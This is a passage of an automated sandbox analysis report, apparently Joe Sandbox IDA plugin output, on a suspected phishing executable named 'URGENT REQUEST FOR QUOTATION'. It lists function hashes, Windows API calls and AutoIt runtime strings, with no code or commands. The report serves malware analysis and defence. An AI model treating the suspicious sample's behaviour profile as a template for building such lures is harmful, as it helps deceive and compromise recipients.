                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                      • API String ID: 1256254125-909552448
                                                                                                                      • Opcode ID: 29839f75ce315c017f5c7f54c18f234099c77645ce03043b740cb0ec78bcb072
                                                                                                                      • Instruction ID: cc50837bd8fa4fe2cc758f67efca6daf17908fa968abcabef797570c03e6a215
                                                                                                                      • Opcode Fuzzy Hash: 29839f75ce315c017f5c7f54c18f234099c77645ce03043b740cb0ec78bcb072
                                                                                                                      • Instruction Fuzzy Hash: 3971E33260412A8BEB20DE6CCD51DFF37D5ABA0758F250528FC56AB285EB35CD8493A1
                                                                                                                      APIs
                                                                                                                      • _wcslen.LIBCMT ref: 000C835A
                                                                                                                      • _wcslen.LIBCMT ref: 000C836E
                                                                                                                      • _wcslen.LIBCMT ref: 000C8391
                                                                                                                      • _wcslen.LIBCMT ref: 000C83B4
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 000C83F2
                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,000C361A,?), ref: 000C844E
                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000C8487
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 000C84CA
                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000C8501
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 000C850D
                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 000C851D
                                                                                                                      • DestroyIcon.USER32(?), ref: 000C852C
                                                                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 000C8549
                                                                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 000C8555
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                      • String ID: .dll$.exe$.icl
                                                                                                                      • API String ID: 799131459-1154884017
                                                                                                                      • Opcode ID: 3033e41d793cea387a0ba9e4b574ff0e6e7e984263a448e8d12e5ad43860c4e1
                                                                                                                      • Instruction ID: ceb61e8e9e86e896e5715c0995d8f867c6aa8afe864be9a70c69cf587b5ef2fd
                                                                                                                      • Opcode Fuzzy Hash: 3033e41d793cea387a0ba9e4b574ff0e6e7e984263a448e8d12e5ad43860c4e1
                                                                                                                      • Instruction Fuzzy Hash: 5D61D171940619BEEB18DF64CC45FFF77A8BB08711F10860AF915D60D1DBB4AA80DBA4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                      • API String ID: 0-1645009161
                                                                                                                      • Opcode ID: 319eca1a81fbff0982ded6812075b11dc657e6296247da544bba1839ed52af3e
                                                                                                                      • Instruction ID: 96503aedd970be57e21e7a00b84a75f541771ce2868925fed27a15c104ac1911
                                                                                                                      • Opcode Fuzzy Hash: 319eca1a81fbff0982ded6812075b11dc657e6296247da544bba1839ed52af3e
                                                                                                                      • Instruction Fuzzy Hash: 6C81D3B1A44605BBEB72AF60CC42FEF37A9AF15301F048025FD09AA193EBB4D915C795
                                                                                                                      APIs
                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 000A3EF8
                                                                                                                      • _wcslen.LIBCMT ref: 000A3F03
                                                                                                                      • _wcslen.LIBCMT ref: 000A3F5A
                                                                                                                      • _wcslen.LIBCMT ref: 000A3F98
                                                                                                                      • GetDriveTypeW.KERNEL32(?), ref: 000A3FD6
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000A401E
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000A4059
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000A4087
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                      • API String ID: 1839972693-4113822522
                                                                                                                      • Opcode ID: 488ca76bb9aabce7fe9c861a41950c16da9a82f7f5d5ce9ed24b88631eb4d2ee
                                                                                                                      • Instruction ID: 7b9f6eb430a0a835f1a664dc4864b4185c0fe8bfd409780fd99c775cd8952179
                                                                                                                      • Opcode Fuzzy Hash: 488ca76bb9aabce7fe9c861a41950c16da9a82f7f5d5ce9ed24b88631eb4d2ee
                                                                                                                      • Instruction Fuzzy Hash: 3B71F0326042059FC310EF24C8819BBB7F8EF95758F10492DFA9697252EB31EE45CB91
                                                                                                                      APIs
                                                                                                                      • LoadIconW.USER32(00000063), ref: 00095A2E
                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00095A40
                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00095A57
                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00095A6C
                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00095A72
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00095A82
                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00095A88
                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00095AA9
                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00095AC3
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00095ACC
                                                                                                                      • _wcslen.LIBCMT ref: 00095B33
                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00095B6F
                                                                                                                      • GetDesktopWindow.USER32 ref: 00095B75
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00095B7C
                                                                                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00095BD3
                                                                                                                      • GetClientRect.USER32(?,?), ref: 00095BE0
                                                                                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 00095C05
                                                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00095C2F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 895679908-0
                                                                                                                      • Opcode ID: 93669f4a4ab738afc8838e1fd914c57a77eaa2159f54256c3f6d0775abe0fc62
                                                                                                                      • Instruction ID: 1b58f1f282af208c50752b52f9613cb2fa7c6c0e59fb3bee1cbc0b8961292a0b
                                                                                                                      • Opcode Fuzzy Hash: 93669f4a4ab738afc8838e1fd914c57a77eaa2159f54256c3f6d0775abe0fc62
                                                                                                                      • Instruction Fuzzy Hash: 27719D31900B09AFEF21DFA9CE85EAEBBF5FF48705F104518E586A25A0D774E940DB10
                                                                                                                      APIs
                                                                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 000AFE27
                                                                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 000AFE32
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 000AFE3D
                                                                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 000AFE48
                                                                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 000AFE53
                                                                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 000AFE5E
                                                                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 000AFE69
                                                                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 000AFE74
                                                                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 000AFE7F
                                                                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 000AFE8A
                                                                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 000AFE95
                                                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 000AFEA0
                                                                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 000AFEAB
                                                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 000AFEB6
                                                                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 000AFEC1
                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 000AFECC
                                                                                                                      • GetCursorInfo.USER32(?), ref: 000AFEDC
                                                                                                                      • GetLastError.KERNEL32 ref: 000AFF1E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3215588206-0
                                                                                                                      • Opcode ID: c7319dd9e4f75ded928d1489d21e9faa73930442caf923dbdbba0fb4de391911
                                                                                                                      • Instruction ID: 5b7d263da5a2f3248efdc1c236e7754c0c57bae854aa9e1c8b6612308284e998
                                                                                                                      • Opcode Fuzzy Hash: c7319dd9e4f75ded928d1489d21e9faa73930442caf923dbdbba0fb4de391911
                                                                                                                      • Instruction Fuzzy Hash: 734153B0D0431A6EDB509FBA8C85C6EBFE8FF05354B50453AE11DEB281DB7899018F91
                                                                                                                      APIs
                                                                                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 000500C6
                                                                                                                        • Part of subcall function 000500ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0010070C,00000FA0,639B3D4A,?,?,?,?,000723B3,000000FF), ref: 0005011C
                                                                                                                        • Part of subcall function 000500ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,000723B3,000000FF), ref: 00050127
                                                                                                                        • Part of subcall function 000500ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,000723B3,000000FF), ref: 00050138
                                                                                                                        • Part of subcall function 000500ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0005014E
                                                                                                                        • Part of subcall function 000500ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0005015C
                                                                                                                        • Part of subcall function 000500ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0005016A
                                                                                                                        • Part of subcall function 000500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00050195
                                                                                                                        • Part of subcall function 000500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 000501A0
                                                                                                                      • ___scrt_fastfail.LIBCMT ref: 000500E7
                                                                                                                        • Part of subcall function 000500A3: __onexit.LIBCMT ref: 000500A9
                                                                                                                      Strings
                                                                                                                      • SleepConditionVariableCS, xrefs: 00050154
                                                                                                                      • WakeAllConditionVariable, xrefs: 00050162
                                                                                                                      • InitializeConditionVariable, xrefs: 00050148
                                                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00050122
                                                                                                                      • kernel32.dll, xrefs: 00050133
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                      • API String ID: 66158676-1714406822
                                                                                                                      • Opcode ID: ff2c684f5de50e788797c777db8796feb70df2f52562a5ceee2ba67bbd61253a
                                                                                                                      • Instruction ID: 438259a4b90587379473f0c1f868b7e4cee06e2c7af3a0c031e7d4f76f997313
                                                                                                                      • Opcode Fuzzy Hash: ff2c684f5de50e788797c777db8796feb70df2f52562a5ceee2ba67bbd61253a
                                                                                                                      • Instruction Fuzzy Hash: 93214672A41B016BF7115B64EC06F7F33D5EB05B62F04013AFD46A66D2DFB89C048A9A
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen
                                                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                      • API String ID: 176396367-1603158881
                                                                                                                      • Opcode ID: 548552615f32adccbf7a4d77a95364185242cd4f90822221bebc20ebe1ec2a9a
                                                                                                                      • Instruction ID: d9c113e501bed63093dcfc18b3b8c2fc00c6abb5e29ecc3af2bc6900faf9c858
                                                                                                                      • Opcode Fuzzy Hash: 548552615f32adccbf7a4d77a95364185242cd4f90822221bebc20ebe1ec2a9a
                                                                                                                      • Instruction Fuzzy Hash: C3E1D332A00516ABCF689FA8C8417FEBBF4BF44710F558129E556A7241DB30AF85AF90
                                                                                                                      APIs
                                                                                                                      • CharLowerBuffW.USER32(00000000,00000000,000CCC08), ref: 000A4527
                                                                                                                      • _wcslen.LIBCMT ref: 000A453B
                                                                                                                      • _wcslen.LIBCMT ref: 000A4599
                                                                                                                      • _wcslen.LIBCMT ref: 000A45F4
                                                                                                                      • _wcslen.LIBCMT ref: 000A463F
                                                                                                                      • _wcslen.LIBCMT ref: 000A46A7
                                                                                                                        • Part of subcall function 0004F9F2: _wcslen.LIBCMT ref: 0004F9FD
                                                                                                                      • GetDriveTypeW.KERNEL32(?,000F6BF0,00000061), ref: 000A4743
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                      • API String ID: 2055661098-1000479233
                                                                                                                      • Opcode ID: af99fc7ffa9cfbd8ce3c830ef469e1a7f0dc176cfd0e278c3f02f8d66d704562
                                                                                                                      • Instruction ID: d2a1812bbd474e24972d53bb10db3e7d02090945e7a4ff1ccd70960f7ef4f7e9
                                                                                                                      • Opcode Fuzzy Hash: af99fc7ffa9cfbd8ce3c830ef469e1a7f0dc176cfd0e278c3f02f8d66d704562
                                                                                                                      • Instruction Fuzzy Hash: 10B113396083029FC720DF68C891ABEB7E5AFE6724F50491DF596C7292D7B0D884CB52
                                                                                                                      APIs
                                                                                                                      • _wcslen.LIBCMT ref: 000BB198
                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 000BB1B0
                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 000BB1D4
                                                                                                                      • _wcslen.LIBCMT ref: 000BB200
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 000BB214
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 000BB236
                                                                                                                      • _wcslen.LIBCMT ref: 000BB332
                                                                                                                        • Part of subcall function 000A05A7: GetStdHandle.KERNEL32(000000F6), ref: 000A05C6
                                                                                                                      • _wcslen.LIBCMT ref: 000BB34B
                                                                                                                      • _wcslen.LIBCMT ref: 000BB366
                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 000BB3B6
                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 000BB407
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 000BB439
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000BB44A
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000BB45C
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000BB46E
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 000BB4E3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2178637699-0
                                                                                                                      • Opcode ID: 537f4f81eb012252fa790c2bdc022816cb2289ff77b3baa671e36a3748546717
                                                                                                                      • Instruction ID: 135386c8dc5a5162f8c728620feaeed5f677bc5b09857b3296003816d7d3a34d
                                                                                                                      • Opcode Fuzzy Hash: 537f4f81eb012252fa790c2bdc022816cb2289ff77b3baa671e36a3748546717
                                                                                                                      • Instruction Fuzzy Hash: CAF19C716083009FD725EF24C891BAEBBE5AF85714F14895DF8998B2A2CB71EC44CB52
                                                                                                                      APIs
                                                                                                                      • GetMenuItemCount.USER32(00101990), ref: 00072F8D
                                                                                                                      • GetMenuItemCount.USER32(00101990), ref: 0007303D
                                                                                                                      • GetCursorPos.USER32(?), ref: 00073081
                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 0007308A
                                                                                                                      • TrackPopupMenuEx.USER32(00101990,00000000,?,00000000,00000000,00000000), ref: 0007309D
                                                                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 000730A9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 36266755-4108050209
                                                                                                                      • Opcode ID: 66999afd34747c3649084945c8e4c2337fee4a7913477b28259d7342f760e11b
                                                                                                                      • Instruction ID: b760cad8f79e3e058591422984d926217442d5ecc026d8ff45c8b50e09cce0ef
                                                                                                                      • Opcode Fuzzy Hash: 66999afd34747c3649084945c8e4c2337fee4a7913477b28259d7342f760e11b
                                                                                                                      • Instruction Fuzzy Hash: 44710970A44205BEFB319F24CC89F9EBFA8FF04324F208226F5186A1E1C7B5A950D794
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(?,?), ref: 000C6DEB
                                                                                                                        • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 000C6E5F
                                                                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 000C6E81
                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000C6E94
                                                                                                                      • DestroyWindow.USER32(?), ref: 000C6EB5
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00030000,00000000), ref: 000C6EE4
                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000C6EFD
                                                                                                                      • GetDesktopWindow.USER32 ref: 000C6F16
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 000C6F1D
                                                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 000C6F35
                                                                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 000C6F4D
                                                                                                                        • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                      • String ID: 0$tooltips_class32
